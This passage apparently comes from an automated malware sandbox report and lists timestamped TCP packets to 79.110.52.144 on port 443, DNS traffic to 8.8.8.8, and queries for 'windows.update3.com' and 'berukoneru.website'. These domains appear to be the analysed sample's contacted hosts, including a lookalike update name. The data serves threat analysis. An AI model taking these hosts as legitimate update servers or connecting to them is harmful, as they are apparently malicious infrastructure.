                          Dec 14, 2021 10:34:08.065551996 CET49803443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.066442013 CET4434980379.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.066473961 CET4434980379.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.066560030 CET49803443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.066576958 CET4434980379.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.066590071 CET49803443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.066649914 CET4434980279.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.066678047 CET49803443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.066704035 CET4434980279.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.066740990 CET49802443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.066764116 CET4434980279.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.066776991 CET49802443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.066812992 CET49802443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.066962957 CET4434980279.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.067017078 CET4434980279.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.067045927 CET49802443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.067059040 CET4434980279.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.067080021 CET49802443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.067573071 CET4434980279.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.067625999 CET4434980279.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.067672968 CET49802443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.067692995 CET4434980279.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.067709923 CET49802443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.067751884 CET49802443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.068191051 CET4434980279.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.068243027 CET4434980279.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.068295002 CET49802443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.068308115 CET4434980279.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.068324089 CET49802443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.068413973 CET49802443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.071906090 CET4434980179.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.071963072 CET4434980179.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.072031975 CET49801443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.072061062 CET4434980179.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.072083950 CET49801443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.072151899 CET49801443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.073010921 CET4434980179.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.073050976 CET4434980179.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.073108912 CET49801443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.073137999 CET4434980179.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.073156118 CET49801443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.073236942 CET49801443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.073259115 CET4434980179.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.073268890 CET4434980179.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.073304892 CET4434980179.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.073337078 CET49801443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.073360920 CET4434980179.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.073384047 CET49801443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.073416948 CET49801443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.073695898 CET4434980179.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.073735952 CET4434980179.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.073785067 CET49801443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.073811054 CET4434980179.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.073827982 CET49801443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.073904037 CET49801443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.074162960 CET4434980179.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.074201107 CET4434980179.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.074256897 CET49801443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.074279070 CET4434980179.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.074295044 CET49801443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.074371099 CET49801443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.075743914 CET4434980179.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.075783014 CET4434980179.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.075845003 CET49801443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.075865984 CET4434980179.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.075881004 CET49801443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.075977087 CET49801443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.077003956 CET4434980179.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.077050924 CET4434980179.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.077099085 CET49801443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.077116966 CET4434980179.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.077138901 CET49801443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.077156067 CET49801443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.086652994 CET4434980379.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.086730957 CET4434980379.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.086775064 CET49803443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.086805105 CET4434980379.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.086843014 CET49803443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.086880922 CET49803443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.086889029 CET49803443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.087239981 CET4434980279.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.087301016 CET4434980279.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.087349892 CET49802443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.087380886 CET4434980279.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.087397099 CET49802443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.087483883 CET49802443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.087703943 CET4434980379.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.087726116 CET4434980379.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.087793112 CET49803443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.087810993 CET4434980379.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.087829113 CET49803443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.087922096 CET49803443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.088396072 CET4434980279.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.088449955 CET4434980279.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.088511944 CET49802443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.088538885 CET4434980279.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.088552952 CET49802443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.088603973 CET4434980279.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.088632107 CET49802443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.088650942 CET4434980279.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.088679075 CET4434980279.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.088692904 CET49802443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.088707924 CET49802443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.088716984 CET4434980279.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.088762999 CET49802443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.088774920 CET49802443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.089140892 CET4434980279.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.089194059 CET4434980279.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.089237928 CET49802443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.089256048 CET4434980279.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.089270115 CET49802443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.089329958 CET49802443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.089469910 CET4434980379.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.089490891 CET4434980379.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.089556932 CET49803443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.089576006 CET4434980379.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.089591980 CET49803443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.089685917 CET49803443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.089728117 CET4434980379.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.089756012 CET4434980379.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.089812994 CET49803443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.089827061 CET4434980379.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.089840889 CET49803443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.089891911 CET49803443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.090239048 CET4434980279.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.090293884 CET4434980279.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.090362072 CET49802443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.090380907 CET4434980279.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.090394020 CET49802443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.090409040 CET4434980279.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.090488911 CET49802443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.090502977 CET4434980279.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.090588093 CET4434980279.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.090656042 CET49802443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.090878010 CET49802443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.090902090 CET4434980279.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.090976000 CET49802443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.090989113 CET4434980279.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.091483116 CET4434980379.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.091507912 CET4434980379.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.091672897 CET49803443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.091692924 CET4434980379.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.091761112 CET49803443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.092473030 CET4434980379.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.092497110 CET4434980379.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.092566967 CET49803443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.092577934 CET4434980379.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.092603922 CET49803443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.092619896 CET49803443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.093379974 CET4434980379.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.093410015 CET4434980379.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.093480110 CET49803443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.093498945 CET4434980379.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.093542099 CET49803443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.093561888 CET49803443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.097887993 CET4434980179.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.097910881 CET4434980179.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.097990036 CET49801443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.098021030 CET4434980179.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.098043919 CET49801443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.098134995 CET49801443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.098455906 CET4434980179.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.098498106 CET4434980179.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.098551035 CET49801443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.098575115 CET4434980179.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.098604918 CET49801443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.098645926 CET49801443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.098742008 CET4434980179.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.098790884 CET4434980179.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.098818064 CET49801443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.098839045 CET4434980179.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.098861933 CET49801443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.098896980 CET49801443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.099303007 CET4434980179.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.099358082 CET4434980179.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.099404097 CET49801443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.099430084 CET4434980179.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.099447966 CET49801443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.099461079 CET4434980179.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.099523067 CET49801443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.099544048 CET4434980179.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.099610090 CET4434980179.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.099718094 CET49801443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.100064993 CET49801443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.100090981 CET4434980179.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.100138903 CET49801443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.100161076 CET4434980179.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.111049891 CET4434980379.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.111083984 CET4434980379.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.111216068 CET49803443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.111303091 CET4434980379.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.111320019 CET49803443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.111387968 CET4434980379.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.111412048 CET4434980379.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.111433983 CET49803443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.111464024 CET4434980379.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.111473083 CET49803443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.111520052 CET49803443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.111547947 CET49803443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.112185955 CET4434980379.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.112261057 CET4434980379.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.112278938 CET49803443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.112289906 CET4434980379.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.112380028 CET49803443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.112385988 CET49803443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.112699032 CET4434980379.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.112730026 CET4434980379.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.112822056 CET49803443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.112838984 CET4434980379.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.112946987 CET49803443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.120249033 CET4434980379.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.120315075 CET4434980379.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.120328903 CET49803443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.120471954 CET49803443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.120501995 CET4434980379.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.120539904 CET49803443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.120558977 CET4434980379.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.120569944 CET49803443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.120579004 CET4434980379.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.307866096 CET49805443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.307905912 CET4434980579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.307981014 CET49805443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.308825970 CET49805443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.308842897 CET4434980579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.343209982 CET49806443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.343264103 CET4434980679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.343410015 CET49806443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.344280005 CET49806443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.344306946 CET4434980679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.388299942 CET4434980579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.388484001 CET49805443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.390249968 CET49805443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.390259027 CET4434980579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.390649080 CET4434980579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.393121004 CET49805443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.429994106 CET4434980679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.430315971 CET49806443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.432585955 CET49806443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.432605982 CET4434980679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.432913065 CET4434980679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.435363054 CET49806443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.436866999 CET4434980579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.447069883 CET49807443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.447124958 CET4434980779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.447462082 CET49807443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.447889090 CET49807443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.447913885 CET4434980779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.455698013 CET4434980579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.455722094 CET4434980579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.455929041 CET4434980579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.455975056 CET49805443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.456003904 CET49805443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.456521034 CET49805443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.456546068 CET4434980579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.456556082 CET49805443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.456564903 CET4434980579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.476892948 CET4434980679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.486798048 CET4434980679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.486826897 CET4434980679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.486898899 CET4434980679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.486958981 CET49806443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.487390995 CET49806443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.487412930 CET49806443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.487441063 CET4434980679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.487755060 CET49806443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.487773895 CET4434980679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.526319981 CET4434980779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.526705980 CET49807443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.528278112 CET49807443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.528295040 CET4434980779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.528758049 CET4434980779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.530826092 CET49807443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.572969913 CET4434980779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.579396963 CET4434980779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.579433918 CET4434980779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.579529047 CET4434980779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.579592943 CET49807443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.579616070 CET49807443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.579988956 CET49807443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.580018044 CET4434980779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.580032110 CET49807443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.580044031 CET4434980779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.814553976 CET49808443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.814584017 CET4434980879.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.815311909 CET49808443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.815332890 CET49808443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.815337896 CET4434980879.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.892996073 CET4434980879.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.893079996 CET49808443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.896908045 CET49808443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.896917105 CET4434980879.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.897583008 CET4434980879.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.900059938 CET49808443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.944878101 CET4434980879.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.947611094 CET4434980879.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.947683096 CET4434980879.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.947807074 CET4434980879.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.948014975 CET49808443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.948250055 CET49808443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.948268890 CET4434980879.110.52.144192.168.2.5

                          UDP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Dec 14, 2021 10:33:56.145939112 CET5712853192.168.2.58.8.8.8
                          Dec 14, 2021 10:33:56.164990902 CET53571288.8.8.8192.168.2.5
                          Dec 14, 2021 10:33:56.364356041 CET5479153192.168.2.58.8.8.8
                          Dec 14, 2021 10:33:56.382654905 CET53547918.8.8.8192.168.2.5
                          Dec 14, 2021 10:33:56.425647974 CET5046353192.168.2.58.8.8.8
                          Dec 14, 2021 10:33:56.444000959 CET53504638.8.8.8192.168.2.5
                          Dec 14, 2021 10:33:56.735696077 CET5039453192.168.2.58.8.8.8
                          Dec 14, 2021 10:33:56.753909111 CET53503948.8.8.8192.168.2.5
                          Dec 14, 2021 10:34:06.972225904 CET5734453192.168.2.58.8.8.8
                          Dec 14, 2021 10:34:06.988746881 CET53573448.8.8.8192.168.2.5
                          Dec 14, 2021 10:34:07.185264111 CET5445053192.168.2.58.8.8.8
                          Dec 14, 2021 10:34:07.205163956 CET53544508.8.8.8192.168.2.5
                          Dec 14, 2021 10:34:07.244362116 CET5926153192.168.2.58.8.8.8
                          Dec 14, 2021 10:34:07.262615919 CET53592618.8.8.8192.168.2.5
                          Dec 14, 2021 10:34:07.430716991 CET5715153192.168.2.58.8.8.8
                          Dec 14, 2021 10:34:07.448971033 CET53571518.8.8.8192.168.2.5
                          Dec 14, 2021 10:34:07.580158949 CET5941353192.168.2.58.8.8.8
                          Dec 14, 2021 10:34:07.596787930 CET53594138.8.8.8192.168.2.5
                          Dec 14, 2021 10:34:07.788218975 CET6051653192.168.2.58.8.8.8
                          Dec 14, 2021 10:34:07.792956114 CET5164953192.168.2.58.8.8.8
                          Dec 14, 2021 10:34:07.804882050 CET53605168.8.8.8192.168.2.5
                          Dec 14, 2021 10:34:07.810184002 CET6508653192.168.2.58.8.8.8
                          Dec 14, 2021 10:34:07.811239958 CET53516498.8.8.8192.168.2.5
                          Dec 14, 2021 10:34:07.826984882 CET53650868.8.8.8192.168.2.5
                          Dec 14, 2021 10:34:08.269373894 CET5643253192.168.2.58.8.8.8
                          Dec 14, 2021 10:34:08.285397053 CET53564328.8.8.8192.168.2.5
                          Dec 14, 2021 10:34:08.324105024 CET5292953192.168.2.58.8.8.8
                          Dec 14, 2021 10:34:08.340738058 CET53529298.8.8.8192.168.2.5
                          Dec 14, 2021 10:34:08.428600073 CET6431753192.168.2.58.8.8.8
                          Dec 14, 2021 10:34:08.445041895 CET53643178.8.8.8192.168.2.5
                          Dec 14, 2021 10:34:08.793006897 CET6100453192.168.2.58.8.8.8
                          Dec 14, 2021 10:34:08.812880993 CET53610048.8.8.8192.168.2.5

                          DNS Queries

                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                          Dec 14, 2021 10:33:56.145939112 CET192.168.2.58.8.8.80xc7cStandard query (0)windows.update3.comA (IP address)IN (0x0001)
                          Dec 14, 2021 10:33:56.364356041 CET192.168.2.58.8.8.80xce4aStandard query (0)windows.update3.comA (IP address)IN (0x0001)
                          Dec 14, 2021 10:33:56.425647974 CET192.168.2.58.8.8.80xcd9eStandard query (0)windows.update3.comA (IP address)IN (0x0001)
                          Dec 14, 2021 10:33:56.735696077 CET192.168.2.58.8.8.80x8d48Standard query (0)windows.update3.comA (IP address)IN (0x0001)
                          Dec 14, 2021 10:34:06.972225904 CET192.168.2.58.8.8.80x7b27Standard query (0)berukoneru.websiteA (IP address)IN (0x0001)
                          Dec 14, 2021 10:34:07.185264111 CET192.168.2.58.8.8.80x769bStandard query (0)berukoneru.websiteA (IP address)IN (0x0001)
                          Dec 14, 2021 10:34:07.244362116 CET192.168.2.58.8.8.80x2011Standard query (0)berukoneru.websiteA (IP address)IN (0x0001)
                          Dec 14, 2021 10:34:07.430716991 CET192.168.2.58.8.8.80xf508Standard query (0)berukoneru.websiteA (IP address)IN (0x0001)
                          Dec 14, 2021 10:34:07.580158949 CET192.168.2.58.8.8.80xfaStandard query (0)berukoneru.websiteA (IP address)IN (0x0001)
                          Dec 14, 2021 10:34:07.788218975 CET192.168.2.58.8.8.80x2a7cStandard query (0)berukoneru.websiteA (IP address)IN (0x0001)
                          Dec 14, 2021 10:34:07.792956114 CET192.168.2.58.8.8.80x714bStandard query (0)berukoneru.websiteA (IP address)IN (0x0001)
                          Dec 14, 2021 10:34:07.810184002 CET192.168.2.58.8.8.80x6f61Standard query (0)berukoneru.websiteA (IP address)IN (0x0001)
                          Dec 14, 2021 10:34:08.269373894 CET192.168.2.58.8.8.80x72a8Standard query (0)berukoneru.websiteA (IP address)IN (0x0001)
                          Dec 14, 2021 10:34:08.324105024 CET192.168.2.58.8.8.80x80a1Standard query (0)berukoneru.websiteA (IP address)IN (0x0001)
                          Dec 14, 2021 10:34:08.428600073 CET192.168.2.58.8.8.80xf677Standard query (0)berukoneru.websiteA (IP address)IN (0x0001)
                          Dec 14, 2021 10:34:08.793006897 CET192.168.2.58.8.8.80xb228Standard query (0)berukoneru.websiteA (IP address)IN (0x0001)

                          DNS Answers

